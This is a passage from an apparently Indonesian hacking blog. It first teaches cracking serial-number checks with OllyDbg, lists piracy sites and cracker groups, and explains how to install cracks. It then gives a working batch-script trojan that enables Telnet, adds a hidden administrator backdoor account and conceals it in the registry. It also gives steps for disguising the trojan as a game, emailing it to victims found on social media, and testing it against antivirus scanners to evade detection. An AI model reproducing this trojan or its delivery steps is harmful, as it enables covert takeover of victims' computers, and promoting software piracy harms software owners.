  4. Reversing : Secrets of Reverse Engineering by Eldad Eliam
  5. Hacker Disassembling Uncovered by Kris Kaspersky
  6. Hacker Debugging Uncovered by Kris Kaspersky
  7. Fravia’s Pages of Reverse Engineering
*Sebagai tambahan materi downloadlah SDK (Software Develepment Kit) untuk belajar Windows API
Contoh routine sebuah program sederhana
1. Mengecek pemakaian program
aaaa : cmp eax,1e    –> apakah sudah dipakai selama 30 hari (1E = 30)
bbbb : jge dddd        –> lompat ke memori address dddd jika lebih dari atau sama dengan 30 hari
cccc : ax,02
dddd: call yyyy           –> ini untuk memanggil nag screen
eeee: ret                   –> hentikan eksekusi dan keluar
yyyy:                         –> This Program has Expired
zzzz:…
2. Mengecek serial number
100aa : Cmp eax,ebx –> mengecek apakah serial number yang dimasukkan sesuai
100bb : Jz 100xx       –> lompat ke alamat memori 10xxx jika s/n benar
100cc : Mov ax,yyyy
100dd: code…
100xx : code ..           –> successfully registered
100yy : code…
Kamu bisa melatih kemampuan cracking kamu dengan mendownload program kecil di website www.crackme.de
Dalam dunia nyata saat sekarang cracking software tidak semudah ini karena software-software sekarang menggunakan teknik anti debugging juga enkripsi.
Berikut ini saya berikan sebuah contoh mengcrack program sederhana dari seorang cracker yang bernama DeathSpawn sebagai gambaran buat kamu yang ingin tau bagaimana proses mengcrack sebuah program dari para cracker.
Nama program: Abex CrackMe5
Program yang dipakai: Ollydbg
Tingkat Kesulitan : Newbie atau Pemula
Tujuan : Mencari valid serial number
Pertama-tama jalankan program yang akan kita crack :
Crackme
Coba kita masukan sembarang serial number misalnya 12345 :
Crackme2
error
Oo…ternyata serial number yang kita masukan salah dan program menampilkan bad boy (istilah gaul para cracker).
Selanjutnya marilah kita mulai proses debugging dengan menjalankan program Ollydbg. Open file di path kamu menyimpan program yang akan dicrack (Abex CrackMe5) perhatikan gambar berikut :
Ollydbg
Scroll kebawah untuk mencari strings atau kalimat yang muncul saat error pop up atau lebih cepatnya dengan mengklik kanan pilih seach for -> All referenced strings :
String
Noname
terlihat dari text strings referenced by abex crackme5 ada dua kode ASCII yang tampak seperti serial number 4562-ABEX dan L2C-5781, coba kita masukkan kode tersebut kedalam program :
Noname2
error
Dan lagi-lagi kode tersebut ternyata bukanlah serial number yang valid.
Tahap selanjutnya kita harus men-trace kode-kode pada CPU section atau lebih cepatnya double klik pada ASCII “Yep, you entered correct serial” yang mengarahkan kita pada kode dan address atau alamat dimana program menyimpan string bila kita memasukkan serial number yang valid.
Cobalah kita lihat pada kode-kode diatasnya untuk mencari tahu kondisi apa yang membuat program memutuskan untuk menampilkan good boy :
Ollydbg
CPU Disasm
Address Hex dump Command Comments
004010FC |. 83F8 00 CMP EAX,0
004010FF |. 74 16 JE SHORT 00401117
00401101 |. 6A 00 PUSH 0 ; /Type = MB_OK|MB_DEFBUTTON1|MB_APPLMODAL
00401103 |. 68 34244000 PUSH OFFSET abexcm5.00402434 ; |Caption = “Error!”
00401108 |. 68 3B244000 PUSH OFFSET abexcm5.0040243B ; |Text = “The serial you entered is not correct!”
0040110D |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hOwner => [ARG.EBP+8]
00401110 |. E8 56000000 CALL <JMP.&USER32.MessageBoxA> ; \USER32.MessageBoxA
00401115 |. EB 16 JMP SHORT 0040112D
00401117 |> 6A 00 PUSH 0 ; /Type = MB_OK|MB_DEFBUTTON1|MB_APPLMODAL
00401119 |. 68 06244000 PUSH OFFSET abexcm5.00402406 ; |Caption = “Well Done!”
0040111E |. 68 11244000 PUSH OFFSET abexcm5.00402411 ; |Text = “Yep, you entered a correct serial!”
00401123 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hOwner => [ARG.EBP+8]
00401126 |. E8 40000000 CALL <JMP.&USER32.MessageBoxA> ; \USER32.MessageBoxA
0040112B |. EB 00 JMP SHORT 0040112D
0040112D |$ 6A 00 PUSH 0 ; /Result = 0
0040112F |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hDialog => [ARG.EBP+8]
00401132 |. E8 22000000 CALL <JMP.&USER32.EndDialog> ; \USER32.EndDialog
00401137 |. C9 LEAVE
00401138 \. C2 1000 RETN 10
Lihat pada dua baris kode pertama :
CPU Disasm
Address Hex dump Command Comments
004010FC |. 83F8 00 CMP EAX,0
004010FF |. 74 16 JE SHORT 00401117
Dari kode diatas terlihat bahwa program akan menampilkan good boy bila EAX bernilai sama dengan serial number yang kita masukkan yang berarti register EAX memegang serial number yang valid. CMP artinya Compare dan JE artinya Jump if Equal.
Setelah mengetahui kondisi ini tempatkan breakpoint (lokasi dimana Ollydbg akan menghentikan jalannya program pada alamat tertentu) yaitu pada address 004010FC dengan menekan tombol F2 atau double klik. Kemudian jalankan program dengan menekan tombol F9, pada ASCII section sebelah kiri bawah terlihat bahwa serial number yang valid muncul coba kita masukkan serial number ini apakah berhasil atau tidak :
Ascii
sukses
Welldone
Yap…ternyata serial number yang kita masukkan benar, cukup mudah kalau kamu perhatikan baik-baik.
Cara tersebut merupakan cara yg sangat sederhana yg disebut serial fishing (istilah cracker untuk mencari serial number).
Pada saat ini sistem proteksi software sudah sangat meningkat karena adanya teknik Code Obfuscation (cara untuk mempersulit membaca kode program) seperti packing atau compress dan/atau enkripsi seperti yang banyak dilakukan oleh program jahat seperti virus, trojan, worm, rootkit, dsb untuk mempersulit vendor Antivirus untuk melakukan Static Analysis (analisis kode program).
Cracker dapat mengetahui apakah sebuah program menggunakan packer atau tidak dengan cara menggunakan program PE Scanner seperti PEid, StudPE, AT4RE FastScanner, RDG Packer Detector, ProtectionID, dll. Program yang saya contohkan diatas tidak menggunakan packer atau crypter karena memang saya tujukan untuk para pemula dan karena saya sendiri juga masih pemula didunia cracking. Tutorial mengenai cara meng-crack program yang menggunakan packer akan saya berikan menyusul (InsyaAllah).
microsoft
Website yang menyediakan crack, s/n, dan keygen gratis :
  1. www.serials.ws
  2. www.crackserialkeygen.com
  3. http://astatalk.com
Daftar Cracker Group Dunia
Mau tahu group-group cracker elit didunia, berikut ini saya berikan daftar tentang beberapa cracker group dan individu yang paling terkenal dijagad per-cracking-an dunia (beberapa diantaranya mungkin sudah tidak aktif lagi).
Group-group cracker ini biasanya masih ada kaitannya dengan group lain karena beberapa anggota group merupakan mantan anggota dari group lain yang kemudian membentuk group sendiri. Mereka berkomunikasi dengan anggota lain diseluruh dunia melalui IRC channel. Beberapa diantara group ini sudah berdiri bertahun-tahun dan dari yang saya baca di nfo setiap releasenya, mereka mengklaim sudah berhasil mengcrack ribuan software. Kalo mau jadi cracker sejati, belajarlah dari para Master Cracker berikut:
1. +ORC (Old Red Cracker) —> Bapak cracker dunia
2. +Fravia
3. ARTeam
4. AHTeam
5. SnD
6. Team ICU
7. AoRE
8. AT4RE
9. RETeam
10. UnpackCn
11. CracksLatinoS
12. Rogue
13. FFF
14. ARN
15. DIGINSAN
16. CORE
17. PARADOX
18. ZWT
19. SSG
20. AiR
21. X-FORCE
22. LineZero
23. MKDEV
24. DVT
25. ROR
26. ViTALiTY
27. EMBRACE
28. pHAZE
29. REA
30. NoPE
31. REVENGE
32. TSRh
33. MYSTiC
34. Under SEH
35. THETA
36. MESMERiZE
37. BLiZZARD
38. BinPDA
39. IREC
40. DEViANCE
41. RiSE
42. RELOADED
43. SKiDROW
44. Phrozen Crew
45. MiRaGe
46. DEViSO
47. FiGHTCLUB
48. F4CG
49. FASiSO
50. AGaiN
51. AVENGED
52. BReWErS
53. CRBS
54. CzW
55. DELiGHT
56. FASDOX
57. GOW
58. iMMERSiON
59. ISOGER
60. P2P
61. InFiNiTy
62. LUCiFER
63. DOA
64. Cin1 Team (Vietnam)
65. BRD
67. QUASAR
68. EQUiNOX
69. JGTiSO
70. UNION
71. SONiTUS
72. DYNAMiCS
73. MAGNETRiXX
74. MAGNiTUDE
75. LAXiTY
76. iNKiSO
77. MAZE
78. RESTORE
79. BLZiSO
80. ENGiNE
81. SYNTHiC4TE
82. Black Storm (banyak cracker Indonesia di group ini)
83. dll….
Local Cracker Group :
1. IRiS (Indonesia Reversing in Starlight), kalo tidak keliru nama salah satu anggotanya adalah Anvie, mungkin Anvie yang merupakan programer Ansav Antivirus…?!!
2. IRC (Indonesia Reversing Crew), didirikan oleh orakanggo dan NeMeSiS ByTe a.k.a MRHPX
3. KJT (Kocok Jaya Team)
 (Saya hanya tahu 3 cracker group local ini tapi tidak tahu existensi keduanya sampai saat ini…?!!!)
Kamu bisa saja bergabung dengan salah satu dari mereka karena biasanya mereka juga merekrut cracker berbakat (cracker, keygenner, supplier) tanpa memandang kebangsaan anggotanya dan menjadi salah satu cracker elit dunia. Syaratnya jelas seperti yang ada pada file nfo dari setiap software release mereka yaitu kamu harus menguasai pemrograman khususnya Assembly, C/C++, Delphi, Phyton, Ruby, dll (Visual Basic dianggap kurang cocok didunia cracking). Selain itu kamu juga harus bisa meng-unpack software packer dan protector seperti berikut ini :
1. Armadillo
2. Aspack
3. Asprotect
4. UPX
5. Molebox
6. Themida
7. Mew
8. Mpress
9. Fsg
10. Upack
11. YodasCrypter
12. Safecast
13. SecuRom
14. ExeCryptor
15. Expressor
16. Kkrunchy
17. PeSpin
18. SVK Protector
19. tElock
20. STL Packer
21. VMProtect
22. WinUpack
23. WSNPOEM
24. Enigma
25. LaserLock
26. Obsidium
27. PECompact
28. Petite
29. FlexLM
30. Dongle (Hardware based Protection)
31. dll…
Software packer dan protector diatas selain banyak dipakai oleh software developer juga banyak dipakai oleh Vyxers (pembuat virus) diantaranya untuk memperkecil ukuran, menghindari deteksi antivirus dan mempersulit proses static analysis (analisis kode) dari Avers (pembuat antivirus).
Proteksi Software ada bermacam-macam begitu juga teknik untuk mem-break proteksinya. Saat kamu mendownload software di file hosting (Rapidshare, Mediafire, 4shared, Ziddu, Indowebster, Torrent, dll) biasanya sudah termasuk crack yang ada didalam foldernya.
Berikut saya rangkumkan cara-cara untuk menggunakan crack yang biasanya terdapat pada readme file:
1. Serial number (SN)
Untuk software dengan proteksi semacam ini, kamu tinggal mengkopi pastekan serial (dan biasananya beserta nama) kedalam kolom  yang muncul.
2. Crack
Software dengan proteksi semacam ini, kamu harus mengkopi pastekan (copas) crack kedalam folder instalasi sofware, biasanya di C:\Program Files\”nama program”\ dan meng-overwrite file/aplikasi (exe atau dll) yg ada difolder instalasi tersebut. Pastikan file/aplikasi yang mau dioverwrite tidak sedang dijalankan.
3. Patch
Software dengan proteksi semacam ini, kamu kopikan patch kedalam folder instalasi biasanya di C:\Program Files\”nama program”\ dan meng-klik pacth filenya disana. Pastikan program tidak sedang dijalankan sebelum kamu meng-klik patch file tersebut.
4. Reg
Software dengan proteksi ini, kamu hanya tinggal mendobel klik reg file yang ada.
Untuk software yang menggunakan proteksi hardware (dongle) biasanya program di crack menjadi portable walaupun tidak semua program portable sebenarnya berproteksi dongle.
Pada umumnya sebelum menggunakan cara-cara diatas pastikan kamu tidak sedang koneksi ke internet kecuali untuk software tertentu. Beberapa program juga membutuhkan reboot atau restart sebelum kamu bisa menggunakannya secara full version, jadi pastikan kamu membaca readme file sebelum menggunakan software yang sudah dicrack tersebut.
Buat yang mau mendownload Packer detector/PE Scanner

0 Malware (Sekedar Pembelajaran)



Membuat Trojan Sederhana Tanpa Terdeteksi Antivirus

Hai….kali ini saya akan berikan teknik sederhana membuat Trojan dengan menggunakan batch script tapi tidak terdeteksi oleh anti virus. Sebelum saya jelaskan bagaimana caranya saya akan terangkan terlebih dahulu apa itu Trojan.
Trojan atau Remote Administration Tool adalah software yang dibuat untuk mengendalikan komputer lain tapi tanpa sepengetahuan yang punya komputer itu. Trojan terdiri dari server (pembuat/pemilik trojan sebagai pengendali) dan klien (komputer korban atau target yang dikendalikan) dan selalu berkaitan dengan port tertentu untuk berkomunikasi melalui internet atau LAN.
Pada artikel ini saya akan membuat Trojan yang berkomunikasi melalui port Telnet. Anda tidak perlu membuat Trojan dengan Visual Basic, C, dll yang rumit karena dengan batch script sederhana pun kita bisa membuat Trojan tanpa terdeteksi oleh anti virus. Berikut ini adalah batch script dari Trojan saya:

@echo off
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user unknown /add
net user unknown rahasiad00nk
net localgroup administrators unknown /add
reg add HKLM\Software\Microsoft\Windows” “NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v unknown /t REG_DWORD /d 0 /f
exit

Singkatnya batch script diatas akan membuka atau mengaktifkan telnet service dikomputer korban dan menambahkan user account dengan nama “unknown” dan password “rahasiad00nk” yang akan kita gunakan sebagai account untuk masuk dikomputer korban nantinya.
Anda bisa mengganti nama dan password sesuai keinginan anda. Sedangkan registry value diatas dipakai untuk menyembunyikan user account pada saat logon windows waktu komputer dihidupkan sehingga keberadaan kita tidak diketahui oleh korban. Tulis atau copas script diatas di notepad dan simpan sebagai bat file, dalam contoh kali ini saya simpan dengan nama Trojan.bat
Pertanyaan kemudian adalah bagaimana caranya kita memasang/menyebarkan Trojan kita dikomputer target/korban?
Apabila anda mempunyai akses secara fisik atau langsung ke komputer target/korban anda tinggal menyimpan file Trojan.bat diatas di flashdisk anda dan mengkliknya dikomputer korban dan secara otomatis Trojan kita akan aktif. Akan tetapi bagaimana bila kita tidak bisa mengakses secara langsung komputer korban karena korban/target kita berada jauh dari kita? Disinilah tehnik social engineering kita pakai, kita akan menggunakan media email yaitu file attachment/lampiran sebagai tehnik penyebaran Trojan kita. Kalau mau liat email target anda bisa melihat diprofile target difacebook atau social network media lainnya. Tapi kita tidak akan menyebarkannya dengan file bat diatas karena akan menimbulkan kecurigaan target akan tetapi kita akan mengkonversinya menjadi file executable (exe) dengan menggunakan converter atau compiler.
Ada beberapa batch to exe converter yang bisa anda pakai (googling) dan pada contoh ini saya akan menggunakan Quick Batch File Compiler yang telah dicrack. Karena ini adalah tehnik social engineering yaitu memperdaya korban biar mengklik trojan kiriman kita maka saya akan menambahkan sedikit script dari batch script kita diatas:

@echo off
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user unknown /add
net user unknown rahasiad00nk
net localgroup administrators unknown /add
reg add HKLM\Software\Microsoft\Windows” “NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v unknown /t REG_DWORD /d 0 /f
appz\win32sys.exe
exit

Seperti yang anda liat saya menambahkan mode dan appz\win32sys.exe dari script kita. Cls adalah perintah untuk membersihkan layar, sedangkan win32sys.exe adalah game onet yg telah saya rename. Appz\winsys32.exe adalah perintah untuk memanggil win32sys.exe yang saya taruh dalam folder appz (cara ini merupakan trik saya untuk mengelabui korban).
Onet merupakan media yang kita pakai sebagai pemancing/penarik agar Trojan kita diklik/dieksekusi korban. Maksudnya saya akan menyertakan game onet pada kiriman email kita yang disatukan dengan Trojan yang kita paketkan melalui file archive (rar).
Anda bisa mengganti onet dengan aplikasi lain dengan tipe file apapun (jpg, docx, 3gp, dll) yang menarik untuk diklik oleh korban kita. Sebelum kita meng-archive-kan kedua file kita di winrar, kita harus merename (mengganti nama file) kedua file kita agar Trojan kita yang dieksekusi dahulu. Rename Trojan.exe menjadi onet.exe dan onet.exe menjadi nama file sesuka anda, dalam contoh ini biar lebih tricky saya merename onet.exe menjadi win32sys.exe dan menyimpannya dalam folder appz.
Bila sudah anda lakukan hal diatas, satukan kedua file ini dalam file archive (rar) dan kirim melalui email ke komputer korban sebagai attachment. Beri subyek dan kata-kata diemail yang menarik dan memperdayai korban untuk membuka file attachment kita.
Utk melakukan koneksi dengan computer target buka cmd dan ketik :
C:\>telnet IP_Adress_Korban [enter]
Kemudian masukan nama username dan password kita dan administrator right telah kita dapatkan untuk bebas melakukan apa saja di komputer korban.
Trojan dalam batch file tidak terdeteksi oleh anti virus apapun akan tetapi Trojan hasil konversi (batch to exe) terkadang masih memicu heuristic oleh beberapa antivirus karena signature yang dihasilkan oleh karena itu alangkah baiknya kita scan secara online dulu Trojan yang akan kita kirim untuk memastikan apakah trojan kita tidak terdeteksi sebagai virus, karena tidak lucu jika kita mengirim Trojan ke korban tapi saat dieksekusi Trojan kita tidak bisa dijalankan karena diblokir/dihapus oleh antivirus.
Anda bisa menggunakan layanan scan online seperti: www.virustotal.com, www.virusscan.jotti.org, atau www.novirusthanks.org, dll. Apabila Trojan yang kita buat masih terdeteksi oleh beberapa anti virus, kita bisa mengakalinya dengan menggunakan packer, crypter, atau protector (contoh: upx, aspack, themida, molebox, asprotect, dll).

Ingat!
Jangan sampai disalah gunakan.
Salam hangat dari sang Begu Peretas.